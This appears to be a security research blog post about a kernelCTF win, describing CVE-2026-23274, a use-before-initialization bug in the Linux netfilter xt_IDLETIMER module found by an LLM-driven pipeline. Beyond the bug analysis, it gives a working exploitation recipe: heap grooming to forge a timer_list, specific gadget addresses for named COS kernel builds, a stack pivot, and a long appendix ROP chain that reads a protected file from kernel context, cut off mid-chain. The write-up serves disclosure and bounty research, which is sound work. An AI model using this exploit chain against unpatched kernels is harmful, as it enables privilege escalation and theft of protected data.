From a Netfilter Bug to kernelCTF: Exploiting CVE-2026-23274 in the Linux Kernel and winning a $10500 Bounty

Over the past few months, we have been building a new LLM-based security research pipeline that includes automated vulnerability discovery, PoC validation, and exploit generation. This pipeline has already found more than 300 bugs in the Linux kernel, as well as several high-risk zero-day vulnerabilities in the Google Chrome V8 JavaScript engine, leading to multiple kernelCTF wins and more than $100,000 in bug bounties. You can find the full list of bugs here. We have followed the responsible disclosure process, and we will publish more details in the future.

In March, our pipeline discovered a critical vulnerability in the Linux kernel’s netfilter subsystem. We exploited this vulnerability and earned $10,050 through Google kernelCTF. In this post, we walk through the technical details of the vulnerability and the exploit.

Vulnerability Summary

In net/netfilter/xt_IDLETIMER.c, when a label is first created by rev1 with XT_IDLETIMER_ALARM enabled and is later reused from revision 0, the kernel can invoke mod_timer() on uninitialized memory. This creates a Use-Before-initialization condition and can subsequently lead to control-flow hijacking if the uninitialized memory is attacker-controlled.

Specifically, rev0 idletimer_tg_checkentry() reuses an existing object by label and unconditionally calls mod_timer(&info->timer->timer, ...). Rev1 can create an object with timer_type = XT_IDLETIMER_ALARM. In that case, idletimer_tg_create_v1() initializes the alarm backend and never calls timer_setup() for info->timer->timer. As a result, if a rev1 ALARM rule is created first and a rev0 rule later reuses the same label, rev0 touches a struct timer_list that was never initialized.

Vulnerability Analysis

This bug was introduced in Linux kernel v5.7-rc1. Commit 68983a354a65 ("netfilter: xtables: Add snapshot of hardidletimer target") introduced rev1 idletimer_tg_checkentry_v1() and also added a type-confusion check there.

1
if (info->timer->timer_type != info->timer_type) {
2
  pr_debug("Adding/Replacing rule with same label and different timer type is not allowed\n");
3
  mutex_unlock(&list_mutex);
4
  return -EINVAL;
5
}

However, the rev0 path in idletimer_tg_checkentry() still lacks a type-confusion check. As a result, this bug can be triggered by first creating a rev1 ALARM rule and then creating a rev0 rule with the same label, but not the other way around.

In the newly added idletimer_tg_create_v1(), if timer_type & XT_IDLETIMER_ALARM, the function calls only alarm_init() and alarm_start_relative(), but does not call timer_setup() for info->timer->timer:

1
if (info->timer->timer_type & XT_IDLETIMER_ALARM) {
2
  ktime_t tout;
3
  alarm_init(&info->timer->alarm, ALARM_BOOTTIME,
4
       idletimer_tg_alarmproc);
5
  info->timer->alarm.data = info->timer;
6
  tout = ktime_set(info->timeout, 0);
7
  alarm_start_relative(&info->timer->alarm, tout);
8
} else {
9
  timer_setup(&info->timer->timer, idletimer_tg_expired, 0);  // leaves timer uninitialized if timer_type is ALARM
10
  mod_timer(&info->timer->timer,
11
      msecs_to_jiffies(info->timeout * 1000) + jiffies);
12
}

Later, rev0’s idletimer_tg_checkentry() can fetch the timer created by rev1 because __idletimer_tg_find_by_label() uses the same global idletimer_tg_list. It then unconditionally calls mod_timer(&info->timer->timer, ...), triggering the Use-Before-Initialization bug.

1
info->timer = __idletimer_tg_find_by_label(info->label);
2
if (info->timer) {
3
  info->timer->refcnt++;
4
  mod_timer(&info->timer->timer,
5
      msecs_to_jiffies(info->timeout * 1000) + jiffies);  // UBI to CFH
6
  pr_debug("increased refcnt of timer %s to %u\n",
7
     info->label, info->timer->refcnt);
8
}

Our team patched the bug in v7.0-rc4 after the kernelCTF submission.

Exploit

Exploit Summary

Prefetch → Kernel base address leak
CVE-2026-23274 → Uninitialized use in mod_timer(); leaving a payload in kmalloc-256 escalates this to control flow hijack directly
NPerm → Place fake stack for ROP chain
ROP → After control flow hijacking, pivot to the stack and execute ROP in softirq to read the flag directly.

Exploit Details

From Uninitialized Use to Control Flow Hijack

Because mod_timer() operates on the uninitialized info->timer->timer field, and the containing idletimer_tg object is allocated with kmalloc(sizeof(*info->timer), GFP_KERNEL), we can control the contents of the uninitialized timer_list timer by reusing a freed kmalloc-256 chunk.

In rev1, the alarm field in struct idletimer_tg is initialized but not the timer field.

The standalone timer_list timer is then used by mod_timer(). It contains the callback function pointer function:

1
struct idletimer_tg {
2
  struct list_head entry;
3
  struct alarm alarm;
4
  struct timer_list timer;
5
  struct work_struct work;
6

7
  struct kobject *kobj;
8
  struct device_attribute attr;
9

10
  unsigned int refcnt;
11
  u8 timer_type;
12
};
13

14
struct timer_list {
15
  struct hlist_node  entry;
16
  unsigned long    expires;
17
  void      (*function)(struct timer_list *);
18
  u32      flags;
19
};

In __mod_timer():

1
int mod_timer(struct timer_list *timer, unsigned long expires)
2
{
3
  return __mod_timer(timer, expires, 0);
4
}
5

6
static inline int
7
__mod_timer(struct timer_list *timer, unsigned long expires, unsigned int options)
8
{
9
  unsigned int idx = UINT_MAX;
10
  ...
11
  debug_assert_init(timer);
12
  if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) {
13
    ...  // We avoid this branch by controlling entry.pprev so timer_pending(timer) returns false.
14
  } else {
15
    base = lock_timer_base(timer, &flags);  // Set timer->flags to 0 to avoid an infinite loop here.
16
    if (!timer->function)
17
      goto out_unlock;
18
    forward_timer_base(base);
19
  }
20
  ...
21
  debug_timer_activate(timer);
22
  timer->expires = expires;
23
  if (idx != UINT_MAX && clk == base->clk)  // Not taken
24
    enqueue_timer(base, timer, idx, bucket_expiry);
25
  else
26
    internal_add_timer(base, timer);  // Will give us CFH later by setting timer->function
27
out_unlock:
28
  raw_spin_unlock_irqrestore(&base->lock, flags);
29
  return ret;
30
}

To pass the timer_pending() check, we simply need to set entry.pprev to 0:

1
struct hlist_node {
2
  struct hlist_node *next, **pprev;
3
};
4
static inline int timer_pending(const struct timer_list * timer)
5
{
6
  return !hlist_unhashed_lockless(&timer->entry);
7
}
8
static inline int hlist_unhashed_lockless(const struct hlist_node *h)
9
{
10
  return !READ_ONCE(h->pprev);
11
}

And also set timer->flags to 0 to avoid an infinite loop in lock_timer_base():

1
static struct timer_base *lock_timer_base(struct timer_list *timer,
2
            unsigned long *flags)
3
  __acquires(timer->base->lock)
4
{
5
  for (;;) {
6
    struct timer_base *base;
7
    u32 tf;
8
    tf = READ_ONCE(timer->flags);
9

10
    if (!(tf & TIMER_MIGRATING)) {  // must enter this branch to avoid an infinite loop
11
      base = get_timer_base(tf);
12
      raw_spin_lock_irqsave(&base->lock, *flags);
13
      if (timer->flags == tf)
14
        return base;
15
      raw_spin_unlock_irqrestore(&base->lock, *flags);
16
    }
17
    cpu_relax();
18
  }
19
}

After one second, the callback in our forged timer_list executes in softirq context, giving us an arb_function(EVIL_TIMER_LIST) primitive.

Stack Pivot after Control Flow Hijack

We discuss why we did not use Ret2BPFJIT in the “Additional Notes” section.

Because the UBI timer_list is rewritten in __mod_timer(), we can directly control only the function pointer, not the arguments.

At that point, RDI and R13 point to the overwritten timer_list, which is part of idletimer_tg in kmalloc-256. If we spray data with user_keypayload into the adjacent chunk, we can control roughly {RDI, R13}:[0x90-0x170] (or the negative offset) as our payload.

(We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); in libxdk, so we turned to our own gadgets.)

We therefore used the following gadgets, which exist in both cos-113-18244.582.2 and cos-113-18244.582.40.

The first-stage gadget controlled RDI and RIP at the same time. To store the fake stack frame, we used NPerm from @kylebot and @n132 in CVE-2025-38477 to place the new stack at a chosen address.

Because the ROP chain is extremely long, we still needed NPerm to create a larger fake stack frame, even though cpu_entry_area was not randomized before Linux 6.2.

The second gadget controlled RDX and RIP at the same time, and also set RBX to a valid address so the final stack-pivot gadget would not crash.
At this point, RDX == RDI == the address of the NPerm fake stack frame.

Finally, the third gadget pivoted RSP from RDX and began ROP execution.

1
// --- initial stack pivot gadgets ---
2
// In short, the stack pivot is:
3
// 1. control PC, the rdi/r13 + 0x90 is a controllable user_keypayload range.
4
// 2. control PC and rdx, the rbx = rdi is a controllable nperm range.
5
// 3. control PC and rsp = rdx, we can now start ROP. Writing to [rbx] will not crash.
6

7
size_t timer_stage1_callback =  0xffffffff81313849;
8
// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax;
9
// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?
10
// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time
11
// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there
12

13

14
size_t nperm_stage1_dispatch =  0xffffffff810643b9;
15
// nperm_stage1_dispatch:
16
// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a];
17
// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax;
18
// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax;
19
// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget).
20
// This also sets rbx to a valid address so the stack pivoting gadget won't crash.
21

22
size_t nperm_stack_pivot =  0xffffffff81db2b0f;
23
// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret;
24
// This is the final stack pivot

ROP to read the flag

We discuss why we did not use core_pattern in the “Additional Notes” section.

There were several issues to solve because we were ROPing in softirq context. Rather than handle them individually, we chose to use a longer ROP chain. NPerm gave us a maximum payload size of 512*8 bytes.

We then used the ROP chain to directly read the flag and print it to the kernel log:

Prepare a fake work_struct in a stable writable kernel region. This object is loaded by rpc_prepare_task+5 as a second controlled object and transfers control into a second pivot sequence. This lets us leave the timer softirq path as early as possible and move the final logic into process context.
Use another attacker-controlled writable kernel region, populated via an arbitrary write during ROP, to hold both the pivot metadata and the final ROP stack. The metadata provides the pop rsp target used by the indirect branch from the fake work item. The stack then writes /flag, a printk format string visible to a low-level attacker, a read position, and a read buffer into writable kernel memory. With those arguments in place, the chain performs filp_open, kernel_read, and finally _printk to emit the flag. We did not use an arbitrary write to set dmesg_restrict to 0, but since we were already doing ROP, we could easily have added that if needed.
Queue the fake work item onto CPU0 and stop the current CPU. The queued kworker can then run the open-read-printk sequence from process context.

This queueing step is necessary because direct VFS activity from timer softirq context is fragile.

Here is the equivalent of our ROP chain in C-like pseudocode:

1
struct fake_work_item {
2
  struct work_struct work;
3
  struct fake_rpc_dispatch {
4
    void *stage2_base;
5
    void *dispatch_target_slot;
6
  } dispatch;
7
};
8

9
struct flag_read_context {
10
  char path[16];
11
  char fmt[16];
12
  loff_t pos;
13
  char buf[0x80];
14
};
15

16
static void stage2_behavior(struct flag_read_context *ctx) {
17
  struct file *fp;
18
  fp = filp_open(ctx->path, O_NOATIME, 0);
19
  kernel_read(fp, ctx->buf, sizeof(ctx->buf), &ctx->pos);
20
  _printk(ctx->fmt, ctx->buf);
21
  for (;;)
22
    cpu_relax();
23
}
24

25
static void semantic_rop_behavior(void *work_base, void *pivot_base) {
26
  struct flag_read_context *ctx = pivot_base + 0x98;
27
  // prepare stage2 context
28
  strcpy(ctx->path, "/flag");
29
  strcpy(ctx->fmt, "\001%s\n");  // make it readable to a very low-level attacker
30
  ctx->pos = 0;
31
  memset(ctx->buf, 0, sizeof(ctx->buf));
32

33
  // stage1 behavior, prepare fake work
34
  struct fake_work_item *item = work_base;  // any rw kernel address
35
  item->work.data = WORK_STRUCT_PENDING_BITS;
36
  item->work.entry.next = &item->work.entry;
37
  item->work.entry.prev = &item->work.entry;
38
  item->work.func = (work_func_t)rpc_prepare_task_plus_5;
39
  item->dispatch.stage2_base = pivot_base;
40
  item->dispatch.dispatch_target_slot = &((char *)pivot_base)[0x66];
41
  *(void **)item->dispatch.dispatch_target_slot = pop_rsp_pop_r13_ret;
42

43
  queue_work_on(0, system_wq, &item->work);
44
  stop_this_cpu();
45
  // The real exploit forges enough metadata so that rpc_prepare_task+5 pivots into a stack whose
46
  // effect is equivalent to calling stage2_behavior(ctx) from kworker process context.
47
}

The full ROP chain can be found in appendix.

Overall, the ROP plan is: use the timer corruption to reach NPerm-backed stack control, use that control to build and queue fake work, and let the queued kworker execute the final file-read-and-print sequence in process context.

Additional Notes

Why not use Ret2BPFJIT

Although kernelCTF now enables bpf_jit_harden by default, attackers can still spray a “kernel one gadget” with unpoisoned instructions and gain root, as shown in the CVE-2025-21700 exploit.

However, their 100% success-rate solution appears to rely on certain registers pointing to a valid address as a side effect of their nop sled.
Those register constraints were not satisfied in our case, and we did not try to adapt or replace the nop sled to make their solution work. As a result, the “kernel one gadget” approach was not viable for us.

Why use ROP to read the flag

Because our corrupted timer_list executed in softirq context, we could not use normal COMMIT_CREDS_RETURN_USER ROP to gain a root shell, nor could we use tricks like telefork.

For the common LPE and container escape technique based on core_pattern, we also could not reliably trigger the usermode helper for the following reasons:

During the stack pivot, we overwrite some callee-saved registers that would be needed to return cleanly from softirq context, mainly for unlocking and related cleanup. We therefore halted the core by calling msleep in softirq context because we had two cores available.
The core dump queues the UMH if core_pattern[0] == '|', and then waits for the dumped process group to exit. That means it queues the actual call_usermodehelper(OUR_LPE_PAYLOAD) request instead of executing it directly.
In our case, the queued request always went to the halted core. As a result, our payload kept being queued but never executed.

We therefore moved to manually queue a read-flag work item onto another core before halting the first core.
The resulting ROP chain is relatively long, and several required gadgets cannot currently be generated by libxdk.

Appendix

Full ROP payload:

1
size_t nperm_addr = 0xffffffff84697000;
2
size_t kaslr_off;
3
void nperm(){
4
    size_t ctx[0x200]        = {};
5
    size_t ct                = 0 ;
6
    size_t nperm_stack_pivot = kaslr_off + 0xffffffff81db2b0f;
7
    size_t pop_rax_pop_rdx_ret = kaslr_off + 0xffffffff812a0d4c;
8
    size_t write_qword_rax_plus_c0_rdx_ret = kaslr_off + 0xffffffff811ff6c5;
9
    size_t rpc_prepare_task_dispatch = kaslr_off + 0xffffffff822248b5;
10
    size_t push_rsi_jmp_qword_ptr_rsi_plus_0x66 =
11
        kaslr_off + 0xffffffff81c6d191;
12
    size_t pop_rsp_pop_r13_ret = kaslr_off + 0xffffffff81002148;
13
    size_t add_rsp_0x88_ret = kaslr_off + 0xffffffff81240dbd;
14
    size_t pop_rsi_ret = kaslr_off + 0xffffffff81b083be;
15
    size_t pop_rdx_pop_rdi_ret = kaslr_off + 0xffffffff819376ab;
16
    size_t pop_rsi_pop_rdi_ret = kaslr_off + 0xffffffff81afda91;
17
    size_t pop_rsi_pop_rdx_pop_rcx_ret = kaslr_off + 0xffffffff810e0e4a;
18
    size_t filp_open = kaslr_off + 0xffffffff8143a420;
19
    size_t mov_rdi_rax_ret = kaslr_off + 0xffffffff8126317d;
20
    size_t kernel_read = kaslr_off + 0xffffffff8143cf10;
21
    size_t printk = kaslr_off + 0xffffffff8120f4b0;
22
    size_t execute_in_process_context_queue = kaslr_off + 0xffffffff811c87f8;
23
    size_t stop_this_cpu = kaslr_off + 0xffffffff810fe7c0;
24
    size_t jmp_self = kaslr_off + 0xffffffff81000649;
25

26
    size_t work_base = 0xffffffff84560920;
27
    size_t pivot_base = 0xffffffff84560a20;
28
    size_t path_ptr = 0xffffffff84560e20;
29
    size_t fmt_ptr = 0xffffffff84560e30;
30
    size_t pos_ptr = 0xffffffff84560e40;
31
    size_t buf_ptr = 0xffffffff84560e60;
32

33
    size_t work_slot_base = work_base - 0xc0;
34
    size_t pivot_slot_base = pivot_base - 0xc0;
35
    size_t final_stage_slot_base = pivot_base + 0x98 - 0xc0;
36

37
    size_t fake_work_list = work_base + 0x08;
38
    size_t pivot_indirect_window = pivot_slot_base + 0x60;
39
    size_t path_storage_slot = path_ptr - 0xc0;
40
    size_t fmt_storage_slot = fmt_ptr - 0xc0;
41
    size_t pos_storage_slot = pos_ptr - 0xc0;
42

43
    size_t fake_work_data = 0x0000000fffffffe0;
44
    size_t file_open_flags = 0x0000000000040000;
45
    size_t read_count = 0x0000000000000080;
46
    size_t flag_string = 0x00000067616c662f;
47
    size_t fmt_lo = 0x253a47414c463001;
48
    size_t fmt_hi = 0x0000000000000a73;
49

50
    ctx[1] = kaslr_off + nperm_addr - 0xa8 + 16;  // +0xa8=nperm[2]
51
    ctx[2] = nperm_stack_pivot; // rax = New PC
52
    // 0xffffffff81db2b0f: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret;
53
    // rsp = rdx = Nprem[24]
54
    ctx[24] = kaslr_off + nperm_addr + 8 * 25;
55
    // r13 = Nprem[25]
56
    // PC = Nprem[26]
57
    /*
58
     * Real full ROP chain.
59
     *
60
     * Fixed writable kernel staging layout (no-KASLR addresses; runtime code
61
     * adds kaslr_off to code pointers only):
62
     *
63
     *   0xffffffff84560920 WORK_BASE  : fake work_struct + rpc_prepare_task slots
64
     *   0xffffffff84560a20 PIVOT_BASE : process-context pivot metadata + final ROP stack
65
     *   0xffffffff84560e20 PATH_PTR   : "/flag"
66
     *   0xffffffff84560e30 FMT_PTR    : "\x010FLAG:%s\n"
67
     *   0xffffffff84560e40 POS_PTR    : loff_t position for kernel_read()
68
     *   0xffffffff84560e60 BUF_PTR    : kernel_read() output buffer
69
     *
70
     * The odd 0xffffffff845608xx / 0xffffffff845609xx constants below are
71
     * "target - 0xc0" because the write gadget is:
72
     *
73
     *   0xffffffff811ff6c5: mov qword ptr [rax + 0xc0], rdx ; ret
74
     *
75
     * Early slot map:
76
     *
77
     *   0xffffffff84560860 -> WORK_BASE+0x00 : fake work_struct.data
78
     *   0xffffffff84560868 -> WORK_BASE+0x08 : fake work.entry.next
79
     *   0xffffffff84560870 -> WORK_BASE+0x10 : fake work.entry.prev
80
     *   0xffffffff84560878 -> WORK_BASE+0x18 : fake work.func / stage1 dispatcher
81
     *   0xffffffff84560880 -> WORK_BASE+0x20 : cleared padding
82
     *   0xffffffff845608f0 -> WORK_BASE+0x90 : stage2 RSI base
83
     *   0xffffffff845608f8 -> WORK_BASE+0x98 : pointer to dispatch target slot
84
     *   0xffffffff84560900 -> WORK_BASE+0xa0 : dispatch target contents
85
     *   0xffffffff84560960 -> PIVOT_BASE+0x00 : pop-rsp chain head
86
     *   0xffffffff845609c6 -> PIVOT_BASE+0x66 : indirect jump slot for pop rsp
87
     *
88
     * Gadget summary used below:
89
     *
90
     *   0xffffffff812a0d4c: pop rax ; pop rdx ; ret
91
     *   0xffffffff811ff6c5: mov qword ptr [rax + 0xc0], rdx ; ret
92
     *   0xffffffff822248b5: rpc_prepare_task+5:
93
     *                       mov rax,[rdi+0x98]; mov rsi,[rdi+0x90];
94
     *                       mov rax,[rax]; jmp __x86_indirect_thunk_array
95
     *   0xffffffff81c6d191: push rsi ; jmp qword ptr [rsi+0x66]
96
     *   0xffffffff81002148: pop rsp ; pop r13 ; ret
97
     *   0xffffffff81240dbd: add rsp, 0x88 ; ret
98
     *   0xffffffff8143a420: filp_open
99
     *   0xffffffff8126317d: mov rdi, rax ; ret
100
     *   0xffffffff8143cf10: kernel_read
101
     *   0xffffffff8120f4b0: _printk
102
     *   0xffffffff811c87f8: execute_in_process_context+0x48:
103
     *                       mov rsi,rdx; load system_wq; call queue_work_on
104
     *   0xffffffff810fe7c0: stop_this_cpu
105
     */
106
    int rop = 26;
107
    // Build fake work_struct and rpc_prepare_task slots under WORK_BASE.
108
    ctx[rop++] = pop_rax_pop_rdx_ret;
109
    ctx[rop++] = work_slot_base + 0x00;
110
    ctx[rop++] = fake_work_data;
111
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
112
    ctx[rop++] = pop_rax_pop_rdx_ret;
113
    ctx[rop++] = work_slot_base + 0x08;
114
    ctx[rop++] = fake_work_list;
115
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
116
    ctx[rop++] = pop_rax_pop_rdx_ret;
117
    ctx[rop++] = work_slot_base + 0x10;
118
    ctx[rop++] = fake_work_list;
119
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
120
    ctx[rop++] = pop_rax_pop_rdx_ret;
121
    ctx[rop++] = work_slot_base + 0x18;
122
    ctx[rop++] = rpc_prepare_task_dispatch;
123
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
124
    ctx[rop++] = pop_rax_pop_rdx_ret;
125
    ctx[rop++] = work_slot_base + 0x20;
126
    ctx[rop++] = 0x0;
127
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
128

129
    // Seed stage2 dispatcher object:
130
    //   WORK_BASE+0x90 -> RSI base for rpc_prepare_task+5
131
    //   WORK_BASE+0x98 -> pointer to slot holding final jump target
132
    //   WORK_BASE+0xa0 -> target gadget for the RSI-based pivot
133
    ctx[rop++] = pop_rax_pop_rdx_ret;
134
    ctx[rop++] = work_slot_base + 0x90;
135
    ctx[rop++] = pivot_base;
136
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
137
    ctx[rop++] = pop_rax_pop_rdx_ret;
138
    ctx[rop++] = work_slot_base + 0x98;
139
    ctx[rop++] = pivot_indirect_window;
140
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
141
    ctx[rop++] = pop_rax_pop_rdx_ret;
142
    ctx[rop++] = work_slot_base + 0xa0;
143
    ctx[rop++] = push_rsi_jmp_qword_ptr_rsi_plus_0x66;
144
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
145

146
    // Lay out the process-context pivot metadata at PIVOT_BASE.
147
    ctx[rop++] = pop_rax_pop_rdx_ret;
148
    ctx[rop++] = pivot_slot_base + 0x00;
149
    ctx[rop++] = 0x0;
150
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
151
    ctx[rop++] = pop_rax_pop_rdx_ret;
152
    ctx[rop++] = pivot_slot_base + 0x08;
153
    ctx[rop++] = add_rsp_0x88_ret;
154
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
155
    ctx[rop++] = pop_rax_pop_rdx_ret;
156
    ctx[rop++] = pivot_slot_base + 0x60;
157
    ctx[rop++] = 0x0;
158
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
159
    ctx[rop++] = pop_rax_pop_rdx_ret;
160
    ctx[rop++] = pivot_slot_base + 0x68;
161
    ctx[rop++] = 0x0;
162
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
163
    ctx[rop++] = pop_rax_pop_rdx_ret;
164
    ctx[rop++] = pivot_slot_base + 0x66;
165
    ctx[rop++] = pop_rsp_pop_r13_ret;
166
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
167

168
    // Final process-context ROP stack:
169
    //   write "/flag"
170
    //   write printk fmt
171
    //   zero loff_t
172
    //   filp_open -> kernel_read -> _printk
173
    ctx[rop++] = pop_rax_pop_rdx_ret;
174
    ctx[rop++] = final_stage_slot_base + 0x00;
175
    ctx[rop++] = pop_rax_pop_rdx_ret;
176
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
177
    ctx[rop++] = pop_rax_pop_rdx_ret;
178
    ctx[rop++] = final_stage_slot_base + 0x08;
179
    ctx[rop++] = path_storage_slot;
180
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
181
    ctx[rop++] = pop_rax_pop_rdx_ret;
182
    ctx[rop++] = final_stage_slot_base + 0x10;
183
    ctx[rop++] = flag_string;
184
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
185
    ctx[rop++] = pop_rax_pop_rdx_ret;
186
    ctx[rop++] = final_stage_slot_base + 0x18;
187
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
188
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
189
    ctx[rop++] = pop_rax_pop_rdx_ret;
190
    ctx[rop++] = final_stage_slot_base + 0x20;
191
    ctx[rop++] = pop_rax_pop_rdx_ret;
192
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
193
    ctx[rop++] = pop_rax_pop_rdx_ret;
194
    ctx[rop++] = final_stage_slot_base + 0x28;
195
    ctx[rop++] = fmt_storage_slot;
196
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
197
    ctx[rop++] = pop_rax_pop_rdx_ret;
198
    ctx[rop++] = final_stage_slot_base + 0x30;
199
    ctx[rop++] = fmt_lo;
200
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
201
    ctx[rop++] = pop_rax_pop_rdx_ret;
202
    ctx[rop++] = final_stage_slot_base + 0x38;
203
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
204
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
205
    ctx[rop++] = pop_rax_pop_rdx_ret;
206
    ctx[rop++] = final_stage_slot_base + 0x40;
207
    ctx[rop++] = pop_rax_pop_rdx_ret;
208
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
209
    ctx[rop++] = pop_rax_pop_rdx_ret;
210
    ctx[rop++] = final_stage_slot_base + 0x48;
211
    ctx[rop++] = fmt_storage_slot + 0x08;
212
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
213
    ctx[rop++] = pop_rax_pop_rdx_ret;
214
    ctx[rop++] = final_stage_slot_base + 0x50;
215
    ctx[rop++] = fmt_hi;
216
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
217
    ctx[rop++] = pop_rax_pop_rdx_ret;
218
    ctx[rop++] = final_stage_slot_base + 0x58;
219
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
220
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
221
    ctx[rop++] = pop_rax_pop_rdx_ret;
222
    ctx[rop++] = final_stage_slot_base + 0x60;
223
    ctx[rop++] = pop_rax_pop_rdx_ret;
224
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
225
    ctx[rop++] = pop_rax_pop_rdx_ret;
226
    ctx[rop++] = final_stage_slot_base + 0x68;
227
    ctx[rop++] = pos_storage_slot;
228
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
229
    ctx[rop++] = pop_rax_pop_rdx_ret;
230
    ctx[rop++] = final_stage_slot_base + 0x70;
231
    ctx[rop++] = 0x0;
232
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
233
    ctx[rop++] = pop_rax_pop_rdx_ret;
234
    ctx[rop++] = final_stage_slot_base + 0x78;
235
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
236
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
237
    ctx[rop++] = pop_rax_pop_rdx_ret;
238
    ctx[rop++] = final_stage_slot_base + 0x80;
239
    ctx[rop++] = pop_rsi_ret;
240
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
241
    ctx[rop++] = pop_rax_pop_rdx_ret;
242
    ctx[rop++] = final_stage_slot_base + 0x88;
243
    ctx[rop++] = file_open_flags;
244
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
245
    ctx[rop++] = pop_rax_pop_rdx_ret;
246
    ctx[rop++] = final_stage_slot_base + 0x90;
247
    ctx[rop++] = pop_rdx_pop_rdi_ret;
248
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
249
    ctx[rop++] = pop_rax_pop_rdx_ret;
250
    ctx[rop++] = final_stage_slot_base + 0x98;
251
    ctx[rop++] = 0x0;
252
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
253
    ctx[rop++] = pop_rax_pop_rdx_ret;
254
    ctx[rop++] = final_stage_slot_base + 0xa0;
255
    ctx[rop++] = path_ptr;
256
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
257
    ctx[rop++] = pop_rax_pop_rdx_ret;
258
    ctx[rop++] = final_stage_slot_base + 0xa8;
259
    ctx[rop++] = filp_open;
260
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
261
    ctx[rop++] = pop_rax_pop_rdx_ret;
262
    ctx[rop++] = final_stage_slot_base + 0xb0;
263
    ctx[rop++] = mov_rdi_rax_ret;
264
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
265
    ctx[rop++] = pop_rax_pop_rdx_ret;
266
    ctx[rop++] = final_stage_slot_base + 0xb8;
267
    ctx[rop++] = pop_rsi_pop_rdx_pop_rcx_ret;
268
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
269
    ctx[rop++] = pop_rax_pop_rdx_ret;
270
    ctx[rop++] = final_stage_slot_base + 0xc0;
271
    ctx[rop++] = buf_ptr;
272
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
273
    ctx[rop++] = pop_rax_pop_rdx_ret;
274
    ctx[rop++] = final_stage_slot_base + 0xc8;
275
    ctx[rop++] = read_count;
276
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
277
    ctx[rop++] = pop_rax_pop_rdx_ret;
278
    ctx[rop++] = final_stage_slot_base + 0xd0;
279
    ctx[rop++] = pos_ptr;
280
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
281
    ctx[rop++] = pop_rax_pop_rdx_ret;
282
    ctx[rop++] = final_stage_slot_base + 0xd8;
283
    ctx[rop++] = kernel_read;
284
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
285
    ctx[rop++] = pop_rax_pop_rdx_ret;
286
    ctx[rop++] = final_stage_slot_base + 0xe0;
287
    ctx[rop++] = pop_rsi_pop_rdi_ret;
288
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
289
    ctx[rop++] = pop_rax_pop_rdx_ret;
290
    ctx[rop++] = final_stage_slot_base + 0xe8;
291
    ctx[rop++] = buf_ptr;
292
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
293
    ctx[rop++] = pop_rax_pop_rdx_ret;
294
    ctx[rop++] = final_stage_slot_base + 0xf0;
295
    ctx[rop++] = fmt_ptr;
296
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
297
    ctx[rop++] = pop_rax_pop_rdx_ret;
298
    ctx[rop++] = final_stage_slot_base + 0xf8;
299
    ctx[rop++] = printk;
300
    ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
301
    ctx[rop++] = pop_rax_pop_rdx_ret;
302
